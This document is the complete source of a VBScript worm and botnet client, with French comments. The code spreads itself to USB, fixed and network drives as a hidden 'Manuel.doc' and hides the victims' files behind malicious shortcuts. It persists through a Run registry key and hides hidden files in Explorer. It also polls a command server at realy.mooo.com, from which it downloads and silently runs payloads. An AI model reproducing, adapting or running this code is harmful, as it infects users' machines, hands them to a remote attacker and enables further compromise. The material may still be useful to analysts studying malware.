'Microsoft (R) Windows Script Host Version 5.8''Copyright (C) Microsoft Corpor

1. 'Microsoft (R) Windows Script Host Version 5.8'
2. 'Copyright (C) Microsoft Corporation. Tous droits r‚serv‚s.
3.  
4. '<coded by Bl4cKs0cK>'
5. On Error Resume Next
6. Dim host
7. host = "realy.mooo.com"
8. Dim host_script
9. host_script = "bot/lancer/index.php"
10. Dim activ_name
11. activ_name = "SysinfY2X.db" 'Le nom du process actif
12. Dim passiv_name
13. passiv_name = "Manuel.doc"
14. Dim sleep_time
15. sleep_time = 2000
16. Dim sleep_time_limit
17. sleep_time_limit = 60000
18. Dim http
19. Set http = CreateObject("MSXML2.ServerXMLHTTP") 'Objet ajax pour aller recuperer url
20. Dim sh
21. Set sh = WScript.CreateObject("WScript.Shell")
22. Dim fs
23. Set fs= CreateObject("Scripting.FileSystemObject") 'creation du nouveau script
24. Dim WMIService
25. Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'prend les droits de l'utilisateur courant
26. Const adTypeBinary = 1
27. Const adTypeText = 2
28. Const adSaveCreateOverWrite = 2
29. Const adSaveCreateNotExist = 1
30. Dim stream_self
31. Set stream_self = CreateObject("Adodb.Stream")'generation du script dans %TEMP%
32. Dim script_name
33. script_name = Wscript.ScriptName
34. Dim tmp_dir
35. tmp_dir = sh.ExpandEnvironmentStrings("%temp%") & "\"
36. host = "http://" & host & "/"
37. stream_self.Type = adTypeBinary 'en fait du binaire
38. stream_self.Open
39. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName) 'crée un stream ADODB
40. Dim script_size
41. script_size = stream_self.Size 'recupere la taille du script
42. If (script_name = activ_name) Then
43. Dim serv_rep, cont, cont_limit
44. cont = 0
45. cont_limit = CInt(sleep_time_limit / sleep_time)
46. While True
47. infect_drives 'infecte les lecteurs
48. infect_registre ' infecte le registre
49. protect_del 'assure la reproduction du fichier dans %TEMP%
50. kill_old("SysinfYhX.db") 'tue le fichier qui a permis son deploiement
51. If cont < cont_limit Then
52. cont = cont + 1
53. wscript.sleep sleep_time
54. Else
55. cont = 0
56. serv_rep = serv_cmd("ping") 'Execute la commande ping vers le serveur realy.mooo.com
57. If serv_rep <> "-1" Then 'si une réponse
58. cont_limit = CInt(CInt(serv_rep) / sleep_time)
59. serv_rep = serv_cmd(script_size & activ_name)'envoie la taille et le nom du script pour connaitre la version et telecharger la nouvelle si besoin
60. If serv_rep <> "-1" Then
61. If serv_rep <> "0" Then
62. get_new_v(serv_rep)
63. Else
64. serv_rep = serv_cmd("list") 'sinon envoie la commande list
65. If serv_rep <> "-1" Then
66. get_list(serv_rep) 'si une reponse positive, execute get_list avec la liste retournee par le serveur
67. End If
68. End If
69. End If
70. Else
71. cont_limit = CInt(sleep_time_limit / sleep_time)
72. End If
73. End If
74. Wend
75. Else
76. infect_machin 'Sinon infecte une machine
77. End if
78. Function serv_cmd(cmd)
79. On Error Resume Next
80. Dim stat
81. http.Open "GET", host & host_script & "?cmd=" & cmd , False 'utilise l'objet HTTP pour GET et lancer la commande passée en arguments
82. http.Send
83. stat = http.Status
84. If stat <> 200 Then
85. serv_cmd = "-1" 'si pas de reponse recoit -1
86. Else
87. serv_cmd=http.ResponseText 'sinon recoit du texte
88. End If
89. End Function
90. Function bot_up(arr)
91. On Error Resume Next
92. Dim stat, frm_, size_, to_, lnc_
93. frm_ = arr(1)
94. size_ = arr(2)
95. to_ = arr(3)
96. lnc_ = arr(4)
97. Dim stream
98. Set stream = CreateObject("Adodb.Stream") 'Cree un stream binaire et génère un fichier avec le tableau passé en entrée
99. stream.Type = adTypeBinary
100. stream.Open
101. If fs.FileExists (tmp_dir & to_) Then
102. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
103. http.Open "GET", frm_, False
104. http.Send
105. If http.Status <> 200 Then
106. bot_up = False
107. Else
108. stream.Write http.ResponseBody
109. fs.GetFile(tmp_dir & to_).Attributes=2
110. fs.DeleteFile tmp_dir & to_, True
111. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
112. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
113. bot_up = True
114. End If
115. Else
116. bot_up = False
117. End If
118. Else
119. http.Open "GET", frm_, False
120. http.Send
121. If http.Status <> 200 Then
122. bot_up = False
123. Else
124. stream.Write http.ResponseBody
125. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
126. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
127. bot_up = True
128. End If
129. End If
130. stream.Close
131. If bot_up Then
132. sh.Run "cmd /c start " & lnc_ & " %temp%\" & to_, 0
133. End If
134. End Function
135. Function get_split(in_)
136. On Error Resume Next
137. Dim ret
138. ret = Array(True, "", 0, "", "")
139. ret(1) = Split(Split(in_, "<from>")(1), "<br>")(0)
140. ret(2) = CInt(Split(Split(in_, "<size>")(1), "<br>")(0))
141. ret(3) = Split(Split(in_, "<to>")(1), "<br>")(0)
142. ret(4) = Split(Split(in_, "<lancer>")(1), "<br>")(0)
143. For Each a In ret
144. If a = "" Or a = " " Then
145. ret(0) = False
146. Exit For
147. End If
148. Next
149. get_split = ret
150. End Function
151. Function get_new_v(req)
152. On Error Resume Next
153. Dim data_
154. data_ = get_split(req)
155. If data_(0) Then
156. If bot_up(data_) Then
157. If data_(3) <> script_name Then
158. del_registre
159. fs.GetFile(Wscript.ScriptFullName).Attributes=2
160. fs.DeleteFile Wscript.ScriptFullName, True
161. End If
162. wscript.quit
163. End If
164. End If
165. End Function
166. Function get_list(req) 'reçoit les données retournées par la commande list sur le serveur
167. On Error Resume Next
168. If req <> "0" Then
169. Dim tbl
170. tbl = Split(req, "<list>")
171. For Each case_ In tbl
172. Dim data_
173. data_ = get_split(case_)
174. If data_(0) Then
175. bot_up(data_)
176. End If
177. Next
178. get_list = True
179. Else
180. get_list = False
181. End If
182. End Function
183. Function infect_machin 'meme principe qu'infect_drives
184. On Error Resume Next
185. infect_registre
186. If fs.FileExists (tmp_dir & activ_name) Then
187. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
188. fs.GetFile(tmp_dir & activ_name).Attributes=2
189. fs.DeleteFile tmp_dir & activ_name, True
190. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
191. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
192. infect_machin = True
193. Else
194. infect_machin = False
195. End If
196. Else
197. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
198. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
199. infect_machin = True
200. End If
201. If infect_machin Then
202. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
203. Else
204. Dim colItms
205. Set colItms = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & activ_name & "%'")
206. If colItms.Count = 0 Then
207. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
208. End If
209. Set colItms = Nothing
210. End If
211. wscript.quit
212. End Function
213. Sub infect_drives 'infection des lecteurs
214. On Error Resume Next
215. Dim sys_drive
216. sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
217. For Each cle In fs.Drives
218. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then 'si le drive est une clé, un network drive ou un cdrom(??)
219. Dim d
220. d = cle.path
221. If d <> sys_drive Then
222. If fs.FileExists(d & "\" & passiv_name) Then 'Si le fichier existe mais ne fait pas la même taille, il le supprime et le remplace par un fichier caché
223. If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & "\" & passiv_name).Size - script_size)) Then
224. fs.GetFile(d & "\" & passiv_name).Attributes=2
225. fs.DeleteFile d & "\" & passiv_name, True
226. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
227. End If
228. Else 'Sinon il le créé
229. If cle.FreeSpace > script_size Then
230. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
231. End If
232. End If
233. fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4 'll donne les attributs read only, fichier caché, et fichier système au fichier
234. If cle.FreeSpace > 0 Then
235. For Each f In fs.GetFolder(d & "\").Files
236. Dim f_ext
237. If instr(f.name, ".") Then
238. Dim f_name
239. f_name = split(f.name, ".")
240. f_ext = lcase( f_name(ubound(f_name)) )
241. Else
242. f_ext = "NULL"
243. End if
244. If f_ext <> "lnk" And f.name <> passiv_name And f.Attributes <> 2+4 Then
245. f.Attributes = 2+4 'cache le dossier existant
246. If fs.FileExists(d & "\" & f.name & ".lnk") Then
247. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 0 'fait apparaitre le lien si besoin
248. End If
249. Dim shurt, s_icon 'Creation du shortcut qui execute cmd avec des arguments
250. Set shurt = sh.CreateShortcut(d & "\" & f.name & ".lnk")
251. shurt.WindowStyle = 7 'Minimized windows <-- pour ne pads qu'on voit le resultat de l'execution du script
252. shurt.TargetPath = "cmd.exe"
253. shurt.WorkingDirectory = ""
254. Dim f_arg 'lance wscript avec le moteur encode pour lire le manuel.doc encodé
255. f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " & replace( f.name," ", ChrW(34) & " " & ChrW(34))
256. shurt.Arguments = f_arg & " & exit" 'puis ferme la fenetre
257. s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & f_ext & "\") & "\DefaultIcon\")' S'attribue l'icone d'un repertoire
258. If ( instr(s_icon, ",") = 0 ) Or f_ext = "NULL" Then
259. shurt.IconLocation = f.path
260. Else
261. shurt.IconLocation = s_icon
262. End if
263. shurt.Save()
264. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 1 ' le place en RO
265. End if
266. Next
267. For Each ff In fs.GetFolder(d & "\").SubFolders
268. If ff.Attributes <> 2+4 Then
269. ff.Attributes = 2+4
270. If fs.FileExists(d & "\" & ff.name & ".lnk") Then
271. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 0
272. End If
273. Dim shurt_, s_icon_
274. Set shurt_ = sh.CreateShortcut(d & "\" & ff.name & ".lnk")
275. shurt_.WindowStyle = 7
276. shurt_.TargetPath = "cmd.exe"
277. shurt_.WorkingDirectory = ""
278. Dim ff_arg 'relance le script pour les sous repertoires
279. ff_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start explorer " & replace( ff.name," ", ChrW(34) & " " & ChrW(34))
280. shurt_.Arguments = ff_arg & " & exit"
281. s_icon_ = sh.regread("HKLM\SOFTWARE\Classes\Folder\DefaultIcon\")
282. If instr(s_icon_, ",") = 0 Then
283. shurt_.IconLocation = ff.path
284. Else
285. shurt_.IconLocation = s_icon_
286. End if
287. shurt_.save()
288. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 1
289. End If
290. Next
291. End If
292. End If
293. End If
294. Next
295. End Sub
296. Sub infect_registre
297. On Error Resume Next
298. Dim target, reg_d
299. target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\" & activ_name 'Crée une tache au démarrage
300. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
301. sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
302. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" 'fait en sorte que n'aparaissent pas les fichiers cachés
303. sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD"
304. End Sub
305. Sub del_registre
306. On Error Resume Next
307. Dim reg_d 'supprime la clé
308. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
309. sh.RegDelete "HKCU" & reg_d
310. End Sub
311. Function protect_del
312. On Error Resume Next
313. If fs.FileExists (tmp_dir & activ_name) Then
314. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
315. fs.GetFile(tmp_dir & activ_name).Attributes=2
316. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite 'remplace le fichier dans le dossier temp
317. End If
318. Else
319. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
320. End If
321. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4 'On reattribue RO/Hidden/SystemFile
322. End Function
323. Function kill_old(old_name)'tue l'ancien processus afin de renouveller le nom et de poursuivre l'infection
324. On Error Resume Next
325. Dim colItems, reg_d
326. Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
327. For Each objItem in colItems
328. objItem.Terminate
329. Next
330. colItems = Nothing
331. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(old_name, ".")(0)
332. sh.RegDelete "HKCU" & reg_d
333. fs.GetFile(tmp_dir & old_name).Attributes=2
334. fs.DeleteFile tmp_dir & "\" & old_name, True
335. End Function